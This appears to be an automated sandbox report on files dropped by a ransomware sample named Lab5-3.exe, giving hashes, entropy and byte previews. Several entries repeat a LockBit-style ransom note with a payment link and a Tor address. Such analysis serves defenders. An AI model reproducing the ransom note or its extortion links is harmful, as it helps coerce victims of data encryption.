                                                                                                          SHA-256:E1E2E10E385DAEC65F183D8C6228092D152BF1F1DBFF737B14223FAF3E07A7C4
                                                                                                          SHA-512:DBC605254E37C68B1BC3F994C78E6A04C8904B43A1E0C832239FD24E7AEA7C376BED33E67B177AAAFFEAB3D77272C2DC3CE538383C20C8AFDFFBC25058A7D268
                                                                                                          Malicious:false
                                                                                                          Preview:..e.......ChS-.h.Z2Q......~i.l......[x......c..R..ZK_..2....%c....3.. I...V=.D....B.....1.....o..gad.`@..h...D^._...C...j....-6|..;a.Rf..zS..F...(...2..r+..].......r0I.H.OR....T.Q...'4..l.....Y..k:bu...Q..`.`$.._Z.....p......]**T..Q.....X.....+QC.g...p]a.........5.............^......@...n.......j)""_..H@'......u.Pi@^3....*P,..<..z........H.;.IeV.R......#...L.C...r<j7.....k6.r".&.z...&.{{.....f...!.{%uP!.^...\.`.2...p3........8|.v..>..].......p.....-.95.~|......c(.cd.i.M..[...7#...sz...P@..i.f^.p...Y...)Pd}.x:.(.*-8...\k>..5.t...W...0...l{.._H..{Aw.....#BP..&..n>."oG<g.....4...o*.$3.i!.O...W.X..A,......+...b....`...P..).F..0.*.......}W.bX.=.......(X./*...]28.....).`.*.........d}a.s. ..T.....2.U....`*.cI....7R.$.."..Od.-.Z...]...*K....3..v.w=.-..X=...x.Y;m.r.r[..........h,./...'.w,6.@..8..f1....)#a..G.W.X......(.!C.a...A.bf.yz....!1.6x..iE..R<.Y..uZ]...Y>..P,...9...J.y..W...w. ..!d/........$..m.b.%l....Zz.......?....i.$....c.]Jx.".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.925497267074368
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dhUyL3WpnfrjKV9SvR3+Yg5uGf0NNeHfUTid3hBaUoSGFcmeykEdEElU92i:syLmpnfrjKY2ZcNNxGx0uKeY2ElUJ
                                                                                                          MD5:A9F3D177740DCE8E4956BF5BD7A70D34
                                                                                                          SHA1:D86B9F7AAAE041A3541085CF9BE891F780B2B0E9
                                                                                                          SHA-256:B723373BE941713407E06152A28FAD7F89F69D9A388F713010B76B405AF30C4C
                                                                                                          SHA-512:35EAAE94A2A4605EDF3A0279D0939485F3CA1D1E909E7094C074A2816B0DC48D35F8A2F48F5F232EF3E0C6EEC5AB3B3BAFD831E7F7C2D249C6C55CFFF035A954
                                                                                                          Malicious:false
                                                                                                          Preview:.<.&i..C..K.AE....4@.XZ..lm.^..D.C ....&.Po9Z..WM..0Uk.L[3..hj........g..A....7..k..0n.o7../..mX.1..A...Tl.F.....[.T6..?A.`..Xc....f..NC.q.-.....U.....1..........)N...*I.A..&.S1.1..{.L.,...3e.r!.$Hd...XNpl.aU..6....U..z-.k`.^.....z..........I.I.q...&...KhX...vH.H-#...P.m0.@...-..:e.H...[....y........l.Tl.[}.R.f.O.N#...;....z.h.&1K...O..t}$A'.k^..B....R..I..j...4.#...L....c....v..*di....IP...{.. iR...A....L.f2...1w..aV.U.~.<..........w.:.J.....t..;%... d ....]S`58..nl.$...7.,..%./I.....8..'.N..?T...x[.}....k[=J..A.6.99B..+..........hG.>}.$....p....hm..QP<......."..`Id..csg%Y+.#...;.......Q...A.\...O..C....%....,........00..5U....s.%g.`AkQ....](}P.VN...d5.]..X-R....;.4ptp..d..{x\`.5....S.......J|Vg.o%X.g.D:..I..q..(u.....e.....UY%`6`R@.k z.....T.}.GC..nA._N.o..1H(...O{....uh..z.....)....;.n...|"5J...n..9}.).GE..J...d1T..u.X.7...dN..K...C.........`..i.I.R&....k...4...b'..H...-{.6f..] t.}s.E."..i.(H..y.E.....T.J.(e.......K.QT.}Q...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24688
                                                                                                          Entropy (8bit):7.992027919191984
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:AHgDKBbfHQ/k84Z2fJk+ogASq9VuP9T+aB93s5l9Q2Cvto8UwzFHWfg7zENttb:AADKBTEcZ2fJkw/+VuP9T+aFtnUyhzgZ
                                                                                                          MD5:F7C605CA8EB14F709FBC1E185DF723FF
                                                                                                          SHA1:24161519A6A21C1D86D6B63F95D9E1E63D61327E
                                                                                                          SHA-256:0438F13AFB69AA230393D96E7487D0668F5D67104BD6E7841090F9FAA28FF1DC
                                                                                                          SHA-512:EEF89B6A187DE49C0DCC1EBBCDBCA39CC75F0142C6BC0CDBF03DD05A8793A70C6F1E08AB1DF315ACCBF7770CF6062F94538A4031B2051853E563A7D8E246BE92
                                                                                                          Malicious:true
                                                                                                          Preview:._$l..,.. Z..=Cf........U..).e....8&....;f.(m|HJ..b-.W..Sw...OLA..H..7F*@.RX....n.S.X8..@.....c.^.z....!!..'....@....t..#..$J...:dG^.>D....U<..).C.r.).$.pH...6.Z.?..F.W......:...Y,............1_.X$..U......>...L0..Dc.OW.^....\.1.,|...P..]...................rr....;Ic<1}......J........(...l..7}Ms,....>.2....9...G......._T..Q...p..\.E#L:.Xoi....@.v.....j..a"..7s.+......$....^...:.m.E...l{........cX.bF.J.79..(..L.xll*."Y5.?wd. ............}..o...Xz..JG..E..r...r.....-C.Z.....n..........F..S.Hxh..fO..U=...v8.>(.i..6.S.[d.U.U%....]..+......!.?a.B..<~.K.....4.."-...%.*'6.V_.f..#.o.a..9.....4.m....k...t.n.N.-...7o...r...z...rI.h...g..a{g.8.Y...mG..5j.J,.Z.....v...Z.^m...<.._8Yir0...e.{.......A..A..A..}D.&..tU..?..(...2;..<.&.uV~..f...&.......QB..v.c..(.L...&.....UX.=.....z(j.^.8.o.,9..|+.(.~.E.|o....F..f.S......k....M0. `...M.xqd%..8y{p{.....;2../|&%......,..*p9.~]..I...}l...'...P.>..i.^@...*g.o.... .sO.k;.ug.ktI.Y.v...u.?........P..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16272
                                                                                                          Entropy (8bit):7.9892562392886335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:iAur3PbFp7TVpivI3QQBF3IUFOM3Wf+ii0c9dettb:i/b3boG5BFNFP3Mc9detZ
                                                                                                          MD5:701C8C52CF36FD2B61708FF03FDBAFB5
                                                                                                          SHA1:78E4DA3F362973C6FB1E58875219FB7E70B34C06
                                                                                                          SHA-256:F513E224AA94F34DC69DE0AFAB37C79FD3C6C780DA336DA9ACD622B6C4E617B5
                                                                                                          SHA-512:88CAB1310D44B84AC8CF87E0703585B43FD6C0EC703CC1E66FB96A56663A779EAE707160C217E009618CAC7D67AAEEFECA68DEFBC1BD2BA31DE056BC2C06C5CE
                                                                                                          Malicious:false
                                                                                                          Preview:..T......l.Zj..'[......T.h...e.,E.s..s.Tr#.hkT.........7....B'c.#.]...........2.2..*s............0Iu...4.sw..%+~....uM.....>....j..X.......I.1.u..K..si.1\.m....H.s....I.....+U....H..J'...'l...PXx..xj...<_\^.;..M...qx...g....DmJ[..Pc..8.A.."A4...m...K%?..n.. .7...N..8'n.#.N....8L....)....6.X.. ..?..,...-.k{u..a.`z.f.hK.0R.3.3\./#.*c.....,....Wy...U.N.Z...\..M.6...8..v?..agf..^..#.P..?...e#....t...C.rvg...U......J.l8H%...f..$...E..?..9f.Z....^.LW..V$...........)4,.U.V..8..[%..a...P..._f.......>..'`,.(..g.t...~.n.w ..J...}3GK..O./.F_..j!.uo.s.tMl.......d./~...+.. T...kr...x..E%..od/......%I.....LaY.&....un...s.b.-..:..G.%.:6<jp.X.n....L...TfY.+z...\U..... 3p..{.UO.B..........*.|..[..P. ..@[...d$.OJi....o(.."..V..l...g...V~ ...`....>Y..O....k?..,4........Z/..P..._t=....E.<..|W..........]...J..$.%.m<.....z4...~..T0v.)..(..A....p..B.....@W}%........pD|.8n....v...=..:K.._23h$.....*. .!~X..G..+K..._=...A4...W. CY.D...,~>.i....IV..\um'4.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15904
                                                                                                          Entropy (8bit):7.98759194648727
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:+41J8D7VEy3KCrDKCflS8maHUThk2K1p/pwFCtb:+41kiyaKKow87y2NX5Z
                                                                                                          MD5:A43EE57255FD0FC991E722E8B229E597
                                                                                                          SHA1:8C717113675C738106B2A72FF9CD22FDB683B59E
                                                                                                          SHA-256:DE108D37B116FAB139DCB76BEAB593C3B21DFA9B9077D2805695BF2E252E1E9C
                                                                                                          SHA-512:A694C82B9FC682F04206901ABF367D3244E0C7B695D2E8C1C399556A37D76F19B7542E283C792060F849A488FD11AD37E4766657D3521BB67B3973987622B3F8
                                                                                                          Malicious:false
                                                                                                          Preview:ru=l...*W....T+..!.6i.ZWv...JH.l..Uk.DfH.#..&.rW..l.7..;.N....uk.T....@.....C...[.N<.C.;.,..M...O.A.{#YI|.`. O..........FZJ,...TS.}.l.{.&..o.[.1gMx....t.."...'}...y.i..9.....~b....W..._...(...]b...!c.G.T..Yo.2..%h.Pq`E..L..|.[..u.@.*3+.5hw.......V.).^..............~f$`.s..i\.@..C-..*..T....._.0.z.....s$c.....X>...y...#..Y.......?.....^..7.lA.j-....r..Et...Z.&R.rf...Z....I.....S......2c.F.\.L........T|C......#._.....'.G.M.y.."........{....J2...Q.>k...E..:P.T..(....C.\{c3....?.e.......a....:.u.BW}.;.../.`..Z.I..Yp.....PV bM.`.....Q.8(.....buM..4O...d.W....a..@....3Y.NG...ZR..6w....I.TZ.....DNP.G...$i...p..9.].G.yQ_..(.....J...dA..}..A.kTU..r.X....2r.v..'D..G.N.6..{~z.|..(2W.~.i...~.*Z.....Q...i...3..C..G..]..amc.Y|..J...S..a....r..5p:..x.v1....B...<x.K..F.z.{...>'..@..n:...4..@.9.....N..{9..~..a.z O.~q.....Ej...t...O.....*Z.W.q..<. ..s..OB,..'W....`CB,.....sK.G(...../|...n...Vv';^......K...ra.;.L.f..R..^lL(...\S.:...!..8.q?_.~........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):255840
                                                                                                          Entropy (8bit):7.9992290803033
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:0QQTMls28EHONSqKfBaT4OhO2hMMMt5RL03XqDL4BFGd5mZ:0o78EsuB6hO2hSjo3XqDMLGK
                                                                                                          MD5:9863E905215BCE4F2720294AB6BF1A7F
                                                                                                          SHA1:B10FD0944B9233A2597BE43C6F5987485C8F1411
                                                                                                          SHA-256:A191C05C02B944FC804F424DCFE9C6DD4A1F3EAEDE4756DF7A8E286326130149
                                                                                                          SHA-512:7B0A402200AD73689A6C0FC6E8A7370AB5916B860934FFC0F6B25F3544DAEDBAAF7A57277C81EF62BE8A5449AE2785DDA4D48317F82272DA5655D57874AA7229
                                                                                                          Malicious:true
                                                                                                          Preview:..r.:h.G4..;.V..r.2{v?.i..W..[.3..........5...P^.j@.1c.j.Zh.m....e.e.m..'...P....W.\A{....Z5...9...\l.u..#..Z.._.Q.[".!|.."........TF]<....[c.w<..TE>+."...P..`........@.0!..N...c%.rVCP..E]......dP......q.M.........../....=.........L...._w....$"....q..x.H....7....q.mP... . s<.....7.Z:..2........iNP....)C...U.2*.....%\t.......z.ri..Zd../f..b.w7K._./....m.{#S...m...@..6.!9....%.Z.">...>R3)3.N....P......8.%.S........`....8=-S..9/.3..8S..].nO:9.X..a.v..K.e.F.Aalh.v./...f.K..O?..9..6.b........}T.:....p.t]6.ae...X;l(.{2}.v.....U...E7&..@...........pzJ.m.f..#vB..+d.P.'..v.oXO7Wq.\..C)......F......:O...1...P.y\.o...w.9.;.......2/.Ap..:Q.... .e...6........iX.C...I..g...5..F.5...f.....$....P..v.V.8!..KIX....#..$....w..Y['<.1..V+.......O.a...%..9:A.9.a.8.....&.)..Z.n...8.....e...C..Z..\. .==.H&..l)s.....Xp..R.j...",.|R...e.[.H.Fb...p...(........p..R..mr..[......P.Ws_......bY>..M..uK.2...xD.........%u..2...i...cTf.C.!X.c.!.f/..vP..H.....@.".l.=~.V...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20912
                                                                                                          Entropy (8bit):7.991813505678717
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:3g7XMaBn7y3txmupAnWSIUdFCvp6IOHzY4HV6INY3Sctb:2n+xCn8vM7fqCcZ
                                                                                                          MD5:F82F1A3FA3DD6E0ED5C12A7C6D16A832
                                                                                                          SHA1:F7EA26A84D16B5617EF66926ADF3FAC4B7F6A5ED
                                                                                                          SHA-256:CFF6D11A4501176F5C9A8BC5C3931058303A571EB56ECB1651D55AB3B57165EF
                                                                                                          SHA-512:25EBE7499728B89E7F4250A8D05B58F794E27A78A9DC1A996E2DE7C472F9112A159A0F296285C5678B9F39FB13616DEDD4E70ED377BC30810964FF5E2F7D4F98
                                                                                                          Malicious:true
                                                                                                          Preview:...cEY.....]&...K.R....E*<.P."C.`V....`....8....(J&r..:..U.e"..*[..../....`hk..7..yD.k..S...[....DR......rI...i.......)w0...%P....jTH.N_.4.Xo.._.6.^..2......c..Y...&-QZW..y....S...T$......$.........].rW...e...@..N'...7..V:o...e..e.......G...d......Z!.=...._Yz.IA.|\..Mot....AW..h..6.SZ][...:..K.B.g..4a.<1.T..u.P.)c.i..d&....b+..... K......E.-..M..<F..I|.....Pu........P.....~!E.u.....5.o..I.-..$PU...Vp!w.}/........@....sf}!|./!..-i%*tKq#...F..........XZ.%...:....++|...J....E^o..&....|Zg\>T.?).YW.t'a.....%......7#6..=.........zg.Za4...R.j.R.tA.K..u<R..Y.../..>Q.K.X.w....z..Fr*.F.;....7P...5...Zr.2,...XNX_.k....s.....3[.mg.=......3..7.U.-C...{8..vv....M:.=.~.Sh..'..F.YOm.,2!.w.o.....*......)p.(...5....}...@.F.X..l.4h."k.2.O..1..x.j.s..X:.7.f..P..c.<.)..X\q......>Q.../Q..H.>,...@._#=(..T...1....]H.....kL..=.Oa...L.]..+.&...D.*.d......dJ....C.o.g....hU...g.u...i..z.....q.....AwQAq.w..5...l........0...m~.......;.....U7y......*...4..%.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):148336
                                                                                                          Entropy (8bit):7.998874603472799
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:xV4smLzr/sVsfNT6M8r35mrzu/5Z/fswYE54wap02J9/PThwhEb/Lb7N4ZLZ:o/kQNT6M8r38Cr8wp54ZJ9/PThwhWb7y
                                                                                                          MD5:6E1636F066ECD43FC98AA480128B4487
                                                                                                          SHA1:6F1009B8D6AD4C96ABA03E63FE059CAE510409E1
                                                                                                          SHA-256:725D7BC4BF750ADBE346EF03FC18787D873CFCE6CF7D0DBC44008DC63D6C8E66
                                                                                                          SHA-512:7B614F66EDD93B9C0B24A33D00B7FA2644DA38161AB4377FB66FE4718FEE2280570722910D98BA2961FDC8F708CC39C521626601AC49CECBA0CA6F164F5A5F38
                                                                                                          Malicious:true
                                                                                                          Preview:.$iU..?.!..>....=:.P...k.q.ctVC.S.#y.[.1.....ir..q.B.X.'T..y... 7...@!.^.._;.....g...`..1)...>.X..KO.....y.s/Qh'Y..\h.jW.R`..I.M..AO........m...N..m..yM......{[.U.C G`\.*....0'.;.5.|V..../\r.........&R..!.?....-......ZPc.v...MP.......Zcc..c.+..m..O.....n2 o$.#..R..o}..7o.T...v.N.%...8C.?....i....y.S.....`.}..d.3w.x..........~=...5....l.?...f.T.c.".^i.=..2n.nLG}5.v..Pc.\..'....D5.O.@:..<....D"!1.(C;.}...q....Q...E.W>@.G3...#|...~._j..t..:..g....[.>......[q...Jk...=......ov.mFR..|..`5.D..)..E.......[.2......V.+.M...$c;...gG%.;,w........:..Q=...s.+....e.....q#...F...d.ki.iaT4.N.y$.A.C.T...!|.......X..|.+....+.\..J.[.M9e..og.$uI.....L......6..).(...tS...+....}/H...p...W...6!..m..........W).w..h.:.,G..P|.......+?.4...CX....3...b.|z..R...c....mfP...H....(.[d;oZ.....-.W2.D...U.y...V.b.........vqwA..q.?.0-E\..M.2.... ....l..q1f.T....2.(]l.....g.>...v.....vw&dg\...<.b.C*Q.qp.Ii.X..I....O'..n.8.3...8....?..I..x......B:7..v.PT.vQ'['...i.......e..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):312091
                                                                                                          Entropy (8bit):7.991061424284916
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:HrX01EDaqvcU6H+a1nLFGU4ZAxzUnFRgYay0RxDrvwuoinNZMPWZ:Hb01EDayY1L1PzUnFRg9yMxDrvwD0UPa
                                                                                                          MD5:A8C9C263644D6802E34D08A168E9BA04
                                                                                                          SHA1:B6583E8248E5A1D5EF7B829F9B445AB89EF546E9
                                                                                                          SHA-256:68C3333D7D6F7CCEB050D1FC51C8166B16CDEC0F7C28CEE231D7A6B00C568D92
                                                                                                          SHA-512:E2CECF1D97F5F37321E6F3B229B6B7E7D6D65F1C09C686DF47570D191CA6A41E4D708424400306FF04680A2ED7E10B81D260BF6970738E1C80B9B43F58D40B1A
                                                                                                          Malicious:true
                                                                                                          Preview:..{.\....pu>^.q..W.a..NPH.Pf.\...\....D.bi..GQ..,...P..{1|....CD.f...p...$-I..:...H*N....,..../ w..0\G..E....^.X7!...2....:..I...L.._.@+..y(!?p..9Y~.@.(....UJ.#...l....5u....uf...i....T.c...jOo.;...OB.<W..{_qm...i.%...]X9DY...jY.}.!..4.wiKEW.F.`-uZ.fy...#......r..X...m..B@...>y~...R...]......8.wHQ.D...t...v`T...Hzh.:..A.' ..T...9..B!..0....H...7..MK.3..$.Pm..*N.... .j..]s}P-.........$C..\.'....H...W..,v...J..b..yy]..v.iq_.g......?.".p...., .m......*....X.^..;..z..)...x...F6.....#.FlU.l..+..r>.F.....w....|...vs.~.n>^...P.1...1..8...6.~B..xp.lX....p].[\*o/TT..I?..:.o...zw..P.....Cm&.K..:.N.2v............Q..0...X.L...&...G..7y @..$i....b.r.1...D..;.Ee.j.N..].Xme.......{.q.n.!Co3k.HzB..a!.B......V..'8?.*p..[...z/...1Q!4..?.._.}*m)2bc...&Ld..x2.~..0.S.-`h8O+.b.S...k+tx...5.T*.......;..K...W\...f.B....C.d..9............*.'..J..&.~.{3.9...Z..3..4{8M..RwU.{....6_..>.yD....../.......%/..#.A.5....C.-[SP/....J.:,8.=9...;..3..V..1E...v$.2q..'$......Ep
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):427556
                                                                                                          Entropy (8bit):7.994360116518856
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:KXuXveMeYBGSqDi+4UI1Gj8u2kCINxkxmCvGv:8uXWaBBp+4x1G4uHNKxrvGv
                                                                                                          MD5:C2DC88865D9D80DC8B8AFDEE1F8E7ECF
                                                                                                          SHA1:D80209F2A03CB437C88CF5F621A2A60D8DDFF1BC
                                                                                                          SHA-256:A5EB38EB3D1B5A8CC5BA7F2054F0B7C1F0D7BF4BB8709E4D70342BFD62C2918C
                                                                                                          SHA-512:0E1016754B974897B353A5F1BE452543DCD4FD3B744FEBF9D723A8BF05622C345474497C6C57AE2049FCE56CBE115EAC25C17A7098C4E616A772AB6062FEC79E
                                                                                                          Malicious:true
                                                                                                          Preview:...1F.t1Ot.pNA...2 ..g.c;#.}.c.....?.+.qV.....`.~.vzVntuh.Y......w.(..nk$77-F_^.a.....)4...5...HV[Yg.31x......Q..*..{...e../dM6.9...K...B`.%.m'...}|x..AF.i.4 .F..i.q.J$e.(._......j...tg.B....PH.#l.]...Q...9./1N.T.K0.S.5.o....f.v...!|.J....!...,..x>m.0...........T>bB..(...\G.e.R`F..|[S|..@/.0.K........S.X.C<...u.5y...M.......o...l.;S....Z.6.dH.j5.....z.,......%...}.... .......A..y..}.W.....[.+....s8...5..QOI^..r....)..}..P~?d$-ca....-R.R.y..g..[....vU5..H...>s...f6.T...&#wpg.."J.....D..h......d05*....v....u..)y....!)Z..c.{I!.tm...v..i.2a....2?..c..cQ.;.VJ.dp..J........b...+wsg.L......+.c.."d<..V.....'.X........~6.....|.l..>.A.e.jY*._6...o0...;....(bo...:.HL.hyhf.>.'.f..a.%.^._.e.u..4....;RE>......x<U..=........}n.4...e.."....*M)....o.....v.2.\..'........$.......6q./&....8T.z.m..$.E...sk5s.c..QN.....E.@........:....y.......l...z{...BES..U..{5.P.;..\IqQ.i.......i..).....6.I.(.N.....?.d..I..xA..........4./.... .....Jhy.R.+...>.9...awb....$....c..4u..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):939668
                                                                                                          Entropy (8bit):7.988205697782688
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:+gLIFsyf3aK9EZOFaUGWiCcyZyoGuWDUN/U:+gLGfoZOTQ+ODUO
                                                                                                          MD5:18250D3BFE47EE72B3540168FD746474
                                                                                                          SHA1:080B5EFC2E1709E5CCDAF1C6A1077FBF9B594CAE
                                                                                                          SHA-256:044AF55DF0C47DC05BEF444C5FE104D052A68B822B888265C04AFBBBA325378A
                                                                                                          SHA-512:EA16BEBF56998314679A42D165BE0B275A2EA10D361DF1393396515857A3D0B3EAF17A116AA18D2B10C9B100B24DD9B5A0810060D8F46B5E8191B1857521C69B
                                                                                                          Malicious:false
                                                                                                          Preview:..E.......Y.@../.v...C.?... .4...0..H..wk...k.W....&.V.-[..@!.5.....%4.!|........#..q7.$./Z.r.9{.=9..k.d...1Pw......x....I...+...o.......S...!......P.!....Z...+`....>]O.6.Y....8.0. .wJ.q.Q.......?.{Q%a..?.JwgK.......'..;I.V..`...)C..Ej .0.k...P,.+t.S..VD'.v(..G.$-...o{.e.....L."....oG....+ZUg.|?..B.eOe.\..:kH.)...<..3=..E.........?.xUu.....0._..H.....|.v...7..O...+.......... .*.w...p2..>...,uq.t.@.D.;..9..&....U.lQ.."..;.$B+..!... .5y.........;..+i /..F~.t.<..."_q.i....Q...|....0...:.9.xw...Y1.,F...p....:.l$.....kL.'...\U......r3.LI..$"...B?..Gch@.Z` . .ZP..F.f.m.'.m..|.....$g..O.<:..q.....k.W..ou].93.m"..x..k.!x6..{Mn...a...+...:!^..D>.m.?.B....-.....chySY4..l....n l...Om..t.s.c6...z.b......e.,iZ.&N9=.0m.OT.>...Q...<e.A.\..$.........='....E.(..[.o......m...]Z..a.q.*...O<...0.....`.8c..tL.r.auI...}C.....3E..*A...KI.hh6....'3.Q.n\...h.......%.u06.I.U..ar9v..}.nz..Y.FK..n..`D78.w....s.J.c..S...y...Ij..q.....x....q#|l.D...H.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):182992
                                                                                                          Entropy (8bit):7.998964318341672
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:6nOcxiRLu+JNG+SqbFHnax+tUPvM+XRx/E1Gz2InAMR+IUMVYePBxNQvPCfvWsR6:IGLuj+Xk9AG6Vu5HYwxWvPsAZ
                                                                                                          MD5:8FEA9D1ABC4B9354574187937A049D34
                                                                                                          SHA1:5A921E15EE9970300F7723DD70DCBF9506C3F3D2
                                                                                                          SHA-256:95553632BB16451100C9E7DDD148C20E53C4CC490F817B8F14735A060CC7394E
                                                                                                          SHA-512:959940BDD313ED9B7307B4F061603192445A7EB10141A16E422FF228203E5BE6B384549AE46F4913FC7253486E556EE3AE6506CB779C41D629751B061209DBCE
                                                                                                          Malicious:true
